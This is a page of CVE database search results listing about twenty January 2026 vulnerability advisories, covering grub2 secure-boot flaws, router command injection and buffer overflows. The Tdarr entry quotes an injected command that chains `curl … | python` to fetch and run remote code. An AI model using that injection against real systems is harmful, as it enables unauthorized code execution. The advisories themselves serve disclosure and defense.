Export limit exceeded: 19263 CVEs match your query. Please refine your search to export 10,000 CVEs or fewer.
Search
Search Results (19263 CVEs found)
| CVE | Vendors | Products | Updated | CVSS v3.1 |
|---|---|---|---|---|
| CVE-2026-22262 | 1 Oisf | 1 Suricata | 2026-01-29 | 5.9 Medium |
| Suricata is a network IDS, IPS and NSM engine. While saving a dataset a stack buffer is used to prepare the data. Prior to versions 8.0.3 and 7.0.14, if the data in the dataset is too large, this can result in a stack overflow. Versions 8.0.3 and 7.0.14 contain a patch. As a workaround, do not use rules with datasets `save` nor `state` options. | ||||
| CVE-2026-24826 | 1 Cadaver | 1 Turso3d | 2026-01-29 | N/A |
| Out-of-bounds Write, Divide By Zero, NULL Pointer Dereference, Use of Uninitialized Resource, Out-of-bounds Read, Reachable Assertion vulnerability in cadaver turso3d.This issue affects . | ||||
| CVE-2025-13654 | 2 Duc Project, Zevv | 2 Duc, Duc | 2026-01-29 | 7.5 High |
| A stack buffer overflow vulnerability exists in the buffer_get function of duc, a disk management tool, where a condition can evaluate to true due to underflow, allowing an out-of-bounds read. | ||||
| CVE-2020-36964 | 1 Ik80 | 1 Yatinywinftp | 2026-01-29 | 9.8 Critical |
| YATinyWinFTP contains a denial of service vulnerability that allows attackers to crash the FTP service by sending a 272-byte buffer with a trailing space. Attackers can exploit the service by connecting and sending a malformed command that triggers a buffer overflow and service crash. | ||||
| CVE-2022-50919 | 1 Tdarr | 1 Tdarr | 2026-01-29 | 9.8 Critical |
| Tdarr 2.00.15 contains an unauthenticated remote code execution vulnerability in its Help terminal that allows attackers to inject and chain arbitrary commands. Attackers can exploit the lack of input filtering by chaining commands like `--help; curl .py | python` to execute remote code without authentication. | ||||
| CVE-2025-0677 | 1 Redhat | 2 Enterprise Linux, Openshift | 2026-01-29 | 6.4 Medium |
| A flaw was found in grub2. When performing a symlink lookup, the grub's UFS module checks the inode's data size to allocate the internal buffer to read the file content, however, it fails to check if the symlink data size has overflown. When this occurs, grub_malloc() may be called with a smaller value than needed. When further reading the data from the disk into the buffer, the grub_ufs_lookup_symlink() function will write past the end of the allocated size. An attack can leverage this by crafting a malicious filesystem, and as a result, it will corrupt data stored in the heap, allowing for arbitrary code execution used to by-pass secure boot mechanisms. | ||||
| CVE-2024-45781 | 1 Redhat | 2 Enterprise Linux, Openshift | 2026-01-29 | 6.7 Medium |
| A flaw was found in grub2. When reading a symbolic link's name from a UFS filesystem, grub2 fails to validate the string length taken as an input. The lack of validation may lead to a heap out-of-bounds write, causing data integrity issues and eventually allowing an attacker to circumvent secure boot protections. | ||||
| CVE-2024-45777 | 2 Gnu, Redhat | 3 Grub2, Enterprise Linux, Openshift | 2026-01-29 | 6.7 Medium |
| A flaw was found in grub2. The calculation of the translation buffer when reading a language .mo file in grub_gettext_getstr_from_position() may overflow, leading to a Out-of-bound write. This issue can be leveraged by an attacker to overwrite grub2's sensitive heap data, eventually leading to the circumvention of secure boot protections. | ||||
| CVE-2024-45776 | 1 Redhat | 2 Enterprise Linux, Openshift | 2026-01-29 | 6.7 Medium |
| When reading the language .mo file in grub_mofile_open(), grub2 fails to verify an integer overflow when allocating its internal buffer. A crafted .mo file may lead the buffer size calculation to overflow, leading to out-of-bound reads and writes. This flaw allows an attacker to leak sensitive data or overwrite critical data, possibly circumventing secure boot protections. | ||||
| CVE-2024-45774 | 1 Redhat | 2 Enterprise Linux, Openshift | 2026-01-29 | 6.7 Medium |
| A flaw was found in grub2. A specially crafted JPEG file can cause the JPEG parser of grub2 to incorrectly check the bounds of its internal buffers, resulting in an out-of-bounds write. The possibility of overwriting sensitive information to bypass secure boot protections is not discarded. | ||||
| CVE-2015-10145 | 1 Gargoyle-router | 1 Gargoyle | 2026-01-29 | 8.8 High |
| Gargoyle router management utility versions 1.5.x contain an authenticated OS command execution vulnerability in /utility/run_commands.sh. The application fails to properly restrict or validate input supplied via the 'commands' parameter, allowing an authenticated attacker to execute arbitrary shell commands on the underlying system. Successful exploitation may result in full compromise of the device, including unauthorized access to system files and execution of attacker-controlled commands. | ||||
| CVE-2025-33234 | 1 Nvidia | 1 Runx | 2026-01-29 | 7.8 High |
| NVIDIA runx contains a vulnerability where an attacker could cause a code injection. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering. | ||||
| CVE-2025-56092 | 1 Ruijie | 5 Rg-ew300t, Rg-ew300t Firmware, X30-pro and 2 more | 2026-01-29 | 8.8 High |
| OS Command Injection vulnerability in Ruijie X30 PRO V1 X30-PRO-V1_09241521 allowing attackers to execute arbitrary commands via a crafted POST request to the module_get in file /usr/local/lua/dev_sta/networkConnect.lua. | ||||
| CVE-2025-1676 | 1 Hzmanyun | 1 Education And Training System | 2026-01-29 | 6.3 Medium |
| A vulnerability classified as critical was found in hzmanyun Education and Training System 3.1.1. Affected by this vulnerability is the function pdf2swf of the file /pdf2swf. The manipulation of the argument file leads to os command injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | ||||
| CVE-2025-8890 | 1 Sdmc | 1 Ne6037 | 2026-01-28 | N/A |
| Firmware in SDMC NE6037 routers prior to version 7.1.12.2.44 has a network diagnostics tool vulnerable to a shell command injection attacks. In order to exploit this vulnerability, an attacker has to log in to the router's administrative portal, which by default is reachable only via LAN ports. | ||||
| CVE-2026-24795 | 1 Cloverhackycolor | 1 Cloverbootloader | 2026-01-27 | N/A |
| Out-of-bounds Write vulnerability in CloverHackyColor CloverBootloader (MdeModulePkg/Universal/RegularExpressionDxe/Oniguruma modules). This vulnerability is associated with program files regcomp.C. This issue affects CloverBootloader: before 5162. | ||||
| CVE-2026-24797 | 1 Neka-nat | 1 Cupoch | 2026-01-27 | N/A |
| Out-of-bounds Write vulnerability in neka-nat cupoch (third_party/libjpeg-turbo/libjpeg-turbo modules). This vulnerability is associated with program files tjbench.C. This issue affects cupoch. | ||||
| CVE-2025-47346 | 1 Qualcomm | 227 Ar8035, Ar8035 Firmware, Fastconnect 6200 and 224 more | 2026-01-27 | 7.8 High |
| Memory corruption while processing a secure logging command in the trusted application. | ||||
| CVE-2026-24809 | 1 Praydog | 1 Reframework | 2026-01-27 | N/A |
| An issue from the component luaG_runerror in dependencies/lua/src/ldebug.c in praydog/REFramework version before 1.5.5 leads to a heap-buffer overflow when a recursive error occurs. | ||||
| CVE-2026-24817 | 1 Praydog | 1 Uevr | 2026-01-27 | N/A |
| Out-of-bounds Write vulnerability in praydog UEVR (dependencies/lua/src modules). This vulnerability is associated with program files ldebug.C, lvm.C. This issue affects UEVR: before 1.05. | ||||